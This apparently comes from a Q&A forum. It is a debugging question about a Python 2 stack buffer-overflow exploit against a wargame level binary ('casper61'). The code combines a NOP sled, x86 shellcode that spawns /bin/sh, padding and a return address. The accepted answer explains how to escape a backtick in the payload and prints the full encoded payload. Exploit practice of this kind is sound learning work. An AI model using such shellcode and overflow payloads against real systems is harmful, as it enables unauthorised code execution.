# Python script issue: "sh: 1: Syntax error: EOF in backquote substitution"

Tags: python, bash

When I try to execute the following script:

```
#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "\x90"*40

shellcode="\x31\xc0\x50\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
buf_addr= "\x60\x98\x04\x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()
```

I got this error:

> sh: 1:Syntax error: EOF in backquote substitution.

I have another similar script that in which only the buffer address is different which works without any problem.

Can someone help me? Thanks

Comment: It looks like your shebang is wrong. You probably want either `#!/usr/bin/python` or  `#!/usr/bin/env python`

Comment: Python 2 or 3 ?

Comment: @shay it is a typo in the post here. My bad, btw in my code I'm using  #!/usr/bin/python

Comment: @PedroLobito i'm using version 2.7.6

Answer (score 2, accepted):

The generated exploit contains a `` ` `` (backquote/backtick) which causes the error, escaping it should fix it.

```
'/casper/casper61 \xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x901\xc3\x80Ph//xhh/bin\xc2\x89\xc3\xa3P\xc2\x89\xc3\xa2S\xc2\x89\xc3\xa1\xc2\xb0\x0b\xc3\x8d\xc2\x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\\`<-HERE\xc2\x98\x04\x08'
```

---

```
payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\\`')
```

Comment: It works. Thanks. I thought it was that, but I wasn't sure about it. By the way I have one more question. As i told in the beginning I have another script that basically have the same exact code except for the buffer address. How is that possible that the exploit in that case doesn't generate any problem ( the  ` char to be precise). Thanks again.

Comment: You're welcome, glad it works! Regarding your comment, I've no idea ;-)